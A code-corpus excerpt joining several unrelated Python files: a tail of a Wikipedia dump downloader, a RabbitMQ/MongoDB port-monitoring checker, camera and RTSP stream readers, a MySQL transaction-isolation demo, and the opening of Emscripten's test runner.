container_client = blob_service_client.get_container_client(args.container_name)
# grab one task from task_list
while 1:
url, file_name, cur_progress, total_num = tasks.assign_task()
if not url:
break
logging.debug('Assigned task (' + str(cur_progress) + '/' + str(total_num) + '): ' + str(url))
if not existFile(args.data_path, file_name, args.compress_type, container_client, azure):
if not azure:
urllib.request.urlretrieve(url, file_name)
else:
page = urllib.request.urlopen(url)
file = io.BytesIO(page.read())
blob_client = blob_service_client.get_blob_client(container=args.container_name,
blob=file_name)
blob_client.upload_blob(file)
logging.debug("File Downloaded: " + url)
else:
logging.debug("File Exists, Skip: " + url)
logging.debug('Exiting.')
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='WikiDump Downloader')
parser.add_argument('--data-path', type=str, default="./data/raw/", help='the data directory')
parser.add_argument('--dumpstatus_path', type=str, default='./data/raw/dumpstatus.json')
parser.add_argument('--compress-type', type=str, default='bz2',
help='the compressed file type to download: 7z or bz2 [default: bz2]')
parser.add_argument('--threads', type=int, default=3, help='number of threads [default: 3]')
parser.add_argument('--start', type=int, default=1, help='the first file to download [default: 0]')
parser.add_argument('--end', type=int, default=-1, help='the last file to download [default: -1]')
parser.add_argument('--verify', action='store_true', default=False,
help='verify the dump files in the specific pat')
parser.add_argument('--azure', action='store_true', default=False,
help='whether to save to azure')
parser.add_argument('--container_name', type=str, default='wikipedia-data',
help='Azure storage container name')
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)s) %(message)s',
)
start_time = datetime.now()
main()
time_elapsed = datetime.now() - start_time
print('Time elapsed (hh:mm:ss.ms) {}'.format(time_elapsed))
|
checker.py
|
import asyncio
import json
from time import time
from typing import Dict
from pymongo import MongoClient
from multiprocessing import Process
from os import getenv
import pika
import argparse
from monitor.config import Env
class CheckerService():
_monitors = []
_rest_config = {}
_start_time: int
_forks = []
# all arg defaults are now sourced from environment and must be set
_env_args = {
"CHECKER_ADDRESS": Env('address', str, '127.0.0.1'),
"CHECKER_PORT": Env('port', int, '8081'),
"CHECKER_DB_CONN_STRING": Env('server', str, None),
"CHECKER_DATABASE_NAME": Env('database', str, None),
"CHECKER_AMQP_NAME": Env('amqp', str, None),
"CHECKER_FORKS_NUM": Env('forks', int, 4),
"CHECKER_WORKERS_NUM": Env('workers', int, 4),
}
def __init__(self):
self._rest_config = self.load_args()
def load_args(self):
def _read_env_args() -> Dict:
defaults = dict()
for env_var, arg in self._env_args.items():
try:
env = arg.env_type(getenv(env_var, arg.env_default))
if env is not None:
defaults[arg.env_name] = env
except:
raise Exception(
"checker.py: Environment variable '{}'(of type '{}') is not set to a type-valid default value.".format(
env_var, arg[1]))
return defaults
def create_parser():
parser = argparse.ArgumentParser(
prog='cheker.py',
description='''Monitoring service Checker''',
epilog='''(c) Alexander Tolkachev 2017.''',
add_help=True
)
# cmd arguments are optional and override or complement environment defaults
parser.add_argument('--address', type=str, help='Listening Address', required=False)
parser.add_argument('--port', type=int, help='Listening Port', required=False)
parser.add_argument('--db', type=str, help='Database connection string', required=False)
parser.add_argument('--database', type=str, help='Monitoring database name', required=False)
parser.add_argument('--amqp', type=str, help='AMQP server', required=False)
parser.add_argument('--forks', type=int, help='Amount of Forks', required=False)
parser.add_argument('--workers', type=int, help='Amount of Workers', required=False)
return parser
# getting defaults from the env - all values guaranteed
config = _read_env_args()
parser = create_parser()
args, unknown = parser.parse_known_args()
arg_dict = {'server': args.db,
'database': args.database,
'forks': args.forks,
'workers': args.workers,
'amqp': args.amqp}
config.update({k: v for k, v in arg_dict.items() if v is not None})
return config
def load_monitors(self):
monitors = []
data = self.monitor_collection.find()
for obj in data:
monitor = {"id": int(obj['id']), "port": int(obj["port"]), "address": obj['address'], "alive": obj['alive']}
monitors.append(monitor)
self._monitors = monitors
return len(self._monitors)
def init_db(self):
self.client = MongoClient(self._rest_config['server'], connect=False)
self.db = self.client[self._rest_config['database']]
self.alert_collection = self.db['alerts']
self.monitor_collection = self.db['monitor']
def start_monitor(self):
self.init_db()
monitor_count = self.load_monitors()
if (monitor_count == 0):
print("There is no monitors in Database")
else:
print("{} monitors loaded.".format(monitor_count))
self.init_amqp()
def start_listen_monitor(self):
def listen_monitor(channel):
channel.queue_declare(queue='monitor')
print('Connected to RabbitMQ')
def callback(ch, method, properties, body):
decoded_body = body.decode()
reload = json.loads(decoded_body)
if (reload['reload']):
self.restart_monitors()
self.load_monitors()
print("Monitors reloaded")
ch.basic_ack(delivery_tag=method.delivery_tag)
return
channel.basic_qos(prefetch_count=1)
channel.basic_consume(on_message_callback=callback, queue='monitor')
channel.start_consuming()
self.init_amqp()
listen_monitor(self.connection.channel())
async def start_publish(self):
async def publish_alerts():
channel = self.connection.channel()
channel.queue_declare(queue='alerts', durable=True)
while True:
self.load_monitors()
for monitor in self._monitors:
channel.basic_publish(exchange='', routing_key='alerts', body=json.dumps(monitor))
await asyncio.sleep(2)
self.start_monitor()
await asyncio.gather(publish_alerts())
def listen_alerts(self):
async def listen_alerts_queue():
connection = pika.BlockingConnection(
pika.ConnectionParameters(host=self._rest_config['amqp'],
credentials=pika.PlainCredentials('guest', 'guest'),
virtual_host="/"))
channel = connection.channel()
channel.queue_declare(queue='alerts', durable=True)
def callback(ch, method, properties, body):
decoded_body = body.decode()
monitor = json.loads(decoded_body)
try:
self.monitor_item(monitor)
except:
print("Oops!")
ch.basic_ack(delivery_tag=method.delivery_tag)
return
channel.basic_qos(prefetch_count=1)
channel.basic_consume(on_message_callback=callback, queue='alerts')
channel.start_consuming()
async def run_listeners():
tasks = []
for i in range(self._rest_config['workers']):
tasks.append(listen_alerts_queue())
await asyncio.gather(*tasks)
self.start_monitor()
alerts_loop = asyncio.new_event_loop()
# asyncio.set_event_loop(alerts_loop)
alerts_loop.run_until_complete(run_listeners())
async def run_monitors(self):
while True:
tasks = []
for item in self._monitors:
# await asyncio.gather(self.monitor_item(item))
tasks.append(self.monitor_item(item))
# await asyncio.wait(tasks)
await asyncio.gather(*tasks)
await asyncio.sleep(5)
def monitor_item(self, item):
response = ''
status = True
self._start_time = time()
connector = asyncio.open_connection(host=item['address'], port=item['port'])
try:
asyncio.wait_for(connector, timeout=0.3)
response = 'Success'
except:
status = False
response = 'Failed'
finally:
print("Monitor {}: Test {}:{} - {}".format(item['id'], item['address'], item['port'], response))
self.update_monitor(monitor=item, status=status)
connector.close()
def update_monitor(self, monitor, status):
update_time = int(time())
if monitor['alive'] != status:
self.monitor_collection.find_one_and_update({'id': monitor['id']},
{'$set': {"alive": status, 'since': update_time}})
monitor['alive'] = status
def init_amqp(self):
self.connection = pika.BlockingConnection(
pika.ConnectionParameters(host=self._rest_config['amqp'],
credentials=pika.PlainCredentials('guest', 'guest'),
virtual_host="/")
)
def restart_monitors(self):
if self._forks:
for i in self._forks:
i.terminate()
self._forks = []
for i in range(self._rest_config['forks']):
p = Process(target=self.listen_alerts, args=())
self._forks.append(p)
p.start()
async def run_amqp_processes(check):
p = Process(target=check.start_listen_monitor, args=())
p.start()
await check.start_publish()
def run_checker():
check = CheckerService()
check.restart_monitors()
loop = asyncio.get_event_loop()
loop.run_until_complete(run_amqp_processes(check))
loop.close()
if __name__ == '__main__':
run_checker()
|
stream.py
|
# import the necessary packages
import numpy as np
import time
from threading import Thread
import requests
import cv2
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
self.stream.release()
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.grabbed, self.frame
def release(self):
# indicate that the thread should be stopped
self.stopped = True
class IPCamVideoStream:
def __init__(self, url):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = requests.get(url, stream=True)
self.frame = np.zeros((360, 480, 3), np.uint8)
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
databytes = b''
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
data = self.stream.raw.read(1024)
databytes += data
a = databytes.find(b'\xff\xd8')
b = databytes.find(b'\xff\xd9')
if a != -1 and b != -1:
jpg = databytes[a:b+2]
databytes = databytes[b+2:]
img = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)
img = np.array(img)
self.frame = img
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class Client:
def __init__(self, rtsp_server_uri):
"""
rtsp_server_uri: the path to an RTSP server. should start with "rtsp://"
verbose: print log or not
drop_frame_limit: how many dropped frames to endure before dropping a connection
retry_connection: whether to retry opening the RTSP connection (after a fixed delay of 15s)
"""
self.rtsp_server_uri = rtsp_server_uri
self.open(rtsp_server_uri)
def __enter__(self,*args,**kwargs):
""" Returns the object which later will have __exit__ called.
This relationship creates a context manager. """
return self
def __exit__(self, type=None, value=None, traceback=None):
""" Together with __enter__, allows support for `with-` clauses. """
self.close()
def open(self,rtsp_server_uri=None):
if rtsp_server_uri:
self.rtsp_server_uri = rtsp_server_uri
else:
rtsp_server_uri = self.rtsp_server_uri
self._capture = RTSPVideoFeed(rtsp_server_uri)
def isOpened(self):
return self._capture.isOpened()
def read(self):
""" Return most recent frame as Pillow image. Returns None if none have been retrieved. """
return self._capture.read()
def preview(self):
self._capture.preview()
def close(self):
self._capture.close()
class RTSPVideoFeed:
""" Maintain live RTSP feed without buffering. """
_stream = None
_latest = None
def __init__(self, rtsp_server_uri, verbose = False):
"""
rtsp_server_uri: the path to an RTSP server. should start with "rtsp://"
verbose: print log or not
"""
self.rtsp_server_uri = rtsp_server_uri
self._verbose = verbose
def __enter__(self,*args,**kwargs):
""" Returns the object which later will have __exit__ called.
This relationship creates a context manager. """
return self
def __exit__(self, type=None, value=None, traceback=None):
""" Together with __enter__, allows support for `with-` clauses. """
self.close()
def open(self):
self.close()
self._stream = cv2.VideoCapture(self.rtsp_server_uri)
time.sleep(.5)
def close(self):
if self.isOpened():
self._stream.release()
def isOpened(self):
try:
return self._stream is not None and self._stream.isOpened()
except:
return False
def read(self):
self.open()
(grabbed, frame) = self._stream.read()
self._latest = frame
self._stream.release()
return self._latest
def preview(self):
""" Blocking function. Opens OpenCV window to display stream. """
win_name = 'RTSP'
cv2.namedWindow(win_name, cv2.WINDOW_AUTOSIZE)
cv2.moveWindow(win_name,20,20)
self.open()
while(self.isOpened()):
cv2.imshow(win_name,self._stream.read()[1])
#if self._latest is not None:
# cv2.imshow(win_name,self._latest)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
cv2.waitKey()
cv2.destroyAllWindows()
cv2.waitKey()
|
test_mysql.py
|
import pymysql
import pymysql.cursors
from multiprocessing import Process
import time
def get_connection():
con = pymysql.connect(
host='localhost',
user='root',
password='example',
db='l8_1_db',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor
)
con.autocommit = False
return con
def ensure_tables():
con = get_connection()
with con:
con.query("""
CREATE TABLE IF NOT EXISTS tbl1 (
id INT NOT NULL AUTO_INCREMENT,
f1 INT NOT NULL,
f2 INT NOT NULL,
PRIMARY KEY (id)
)
""")
con.query('SET autocommit=0')
con.query('SET GLOBAL innodb_status_output=ON')
con.query('SET GLOBAL innodb_status_output_locks=ON')
con.commit()
def ensure_data():
con = get_connection()
with con:
con.query('DELETE FROM tbl1')
con.query('INSERT INTO tbl1 (f1, f2) VALUES (1, 0)')
con.query('INSERT INTO tbl1 (f1, f2) VALUES (2, 0)')
con.commit()
def print_table():
con = get_connection()
with con:
with con.cursor() as cursor:
cursor.execute('SELECT * FROM tbl1')
results = cursor.fetchall()
print(results)
def lost_update():
print('==========================LOST UPDATE========================')
def session1():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('UPDATE tbl1 SET f2=f2+20 WHERE f1=1;')
print('session1: update finished')
con.commit()
def session2():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('UPDATE tbl1 SET f2=f2+25 WHERE f1=1;')
print('session2: update finished')
con.commit()
p1 = Process(target=session1)
p1.start()
p2 = Process(target=session2)
p2.start()
p1.join()
p2.join()
print('=============================================================')
def dirty_read():
print('==========================DIRTY READ========================')
def session1():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
print('session1: select finished % s' % cursor.fetchmany())
cursor.execute('UPDATE tbl1 SET f2=f2+1 WHERE f1=1')
print('session1: update finished')
time.sleep(2)
con.rollback()
print('session 1: rollback')
def session2():
con = get_connection()
with con:
con.begin()
time.sleep(1)
with con.cursor() as cursor:
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
print('session 2: select finished % s' % cursor.fetchmany())
con.commit()
print('session 2: commit')
p1 = Process(target=session1)
p1.start()
p2 = Process(target=session2)
p2.start()
p1.join()
p2.join()
print('=============================================================')
def non_repeatable_read():
print('======================NON REPEATABLE READ======================')
def session1():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
print('session 1: select finished % s' % cursor.fetchmany())
time.sleep(0.01)
cursor.execute('UPDATE tbl1 SET f2=f2+1 WHERE f1=1')
print('session 1: update finished')
con.commit()
print('session 1: commit')
def session2():
con = get_connection()
with con:
con.begin()
time.sleep(0.01)
with con.cursor() as cursor:
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
print('session 2: first select finished % s' %
cursor.fetchmany())
time.sleep(2)
cursor.execute('SELECT f2 FROM tbl1 WHERE f1=1')
print('session 2: second select finished % s' %
cursor.fetchmany())
con.commit()
print('session 2: commit')
p1 = Process(target=session1)
p1.start()
p2 = Process(target=session2)
p2.start()
p1.join()
p2.join()
print('=============================================================')
def phantom_read():
print('======================PHANTOM READ======================')
def session1():
con = get_connection()
with con:
con.begin()
time.sleep(1)
with con.cursor() as cursor:
cursor.execute('INSERT INTO tbl1 (f1, f2) VALUES (15,20)')
print('session 1: insert finished')
con.commit()
print('session 1: commit')
def session2():
con = get_connection()
with con:
con.begin()
with con.cursor() as cursor:
cursor.execute('SELECT sum(f2) FROM tbl1')
print('session 2: first select finished % s' %
cursor.fetchmany())
time.sleep(2)
cursor.execute('SELECT sum(f2) FROM tbl1')
print('session 2: second select finished % s' %
cursor.fetchmany())
con.commit()
print('session 2: commit')
p1 = Process(target=session1)
p1.start()
p2 = Process(target=session2)
p2.start()
p1.join()
p2.join()
print('=============================================================')
TRANSACTION_LVLS = [
'READ UNCOMMITTED',
'READ COMMITTED',
'REPEATABLE READ',
'SERIALIZABLE',
]
def test_levels():
ensure_tables()
for level in TRANSACTION_LVLS:
print('=============TRANSACTION LEVEL = %s ====================' % level)
con = get_connection()
with con:
with con.cursor() as cursor:
cursor.execute(
'SET GLOBAL TRANSACTION ISOLATION LEVEL %s' % level)
con.commit()
for case in [lost_update, dirty_read, non_repeatable_read, phantom_read]:
ensure_data()
case()
print_table()
test_levels()
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote, unquote_plus
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import clang_native
import jsrun
import parallel_testsuite
from jsrun import NON_ZERO
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, EMXX, DEBUG
from tools.shared import LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR
from tools.shared import WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, run_process, try_delete
from tools.shared import asbytes, safe_copy, Settings
from tools import shared, line_endings, building
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# TODO(sbc): Remove this check for the legacy name once its been around for a while.
assert 'EM_SAVE_DIR' not in os.environ, "Please use EMTEST_SAVE_DIR instead of EM_SAVE_DIR"
EMTEST_SAVE_DIR = int(os.getenv('EMTEST_SAVE_DIR', '0'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_LACKS_NATIVE_CLANG = os.getenv('EMTEST_LACKS_NATIVE_CLANG')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def no_asmjs(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm', note, negate=True)
return decorated
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
@contextlib.contextmanager
def js_engines_modify(replacements):
"""A context manager that updates shared.JS_ENGINES."""
original = shared.JS_ENGINES
shared.JS_ENGINES = replacements
try:
yield
finally:
shared.JS_ENGINES = original
@contextlib.contextmanager
def wasm_engines_modify(replacements):
"""A context manager that updates shared.WASM_ENGINES."""
original = shared.WASM_ENGINES
shared.WASM_ENGINES = replacements
try:
yield
finally:
shared.WASM_ENGINES = original
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'strict'
]
if Settings.WASM_BACKEND:
core_test_modes += [
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
else:
core_test_modes += [
'asm0',
'asm2',
'asm3',
'asm2g',
'asm2f',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
]
if Settings.WASM_BACKEND:
non_core_test_modes += [
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = '%s_%s' % (name, suffix)
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the function.
# We add the suffix to it as well.
if hasattr(func, '__qualname__'):
resulting_test.__qualname__ = '%s_%s' % (func.__qualname__, suffix)
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
# This is a hack to make the metaclass work on both python 2 and python 3.
#
# On python 3, the code should be:
# class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# ...
#
# On python 2, the code should be:
# class RunnerCore(unittest.TestCase):
# __metaclass__ = RunnerMeta
# ...
#
# To be compatible with both python 2 and python 3, we create a class by directly invoking the
# metaclass, which is done in the same way on both python 2 and 3, and inherit from it,
# since a class inherits the metaclass by default.
class RunnerCore(RunnerMeta('TestCase', (unittest.TestCase,), {})):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if self.get_setting('WASM_BACKEND') and not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic library support in asan yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.env = {}
self.temp_files_before_run = []
if not Settings.WASM_BACKEND:
os.environ['EMCC_ALLOW_FASTCOMP'] = '1'
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when EMTEST_SAVE_DIR we still try to start with an empty directoy as many tests
# expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_test_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_test_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_test_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
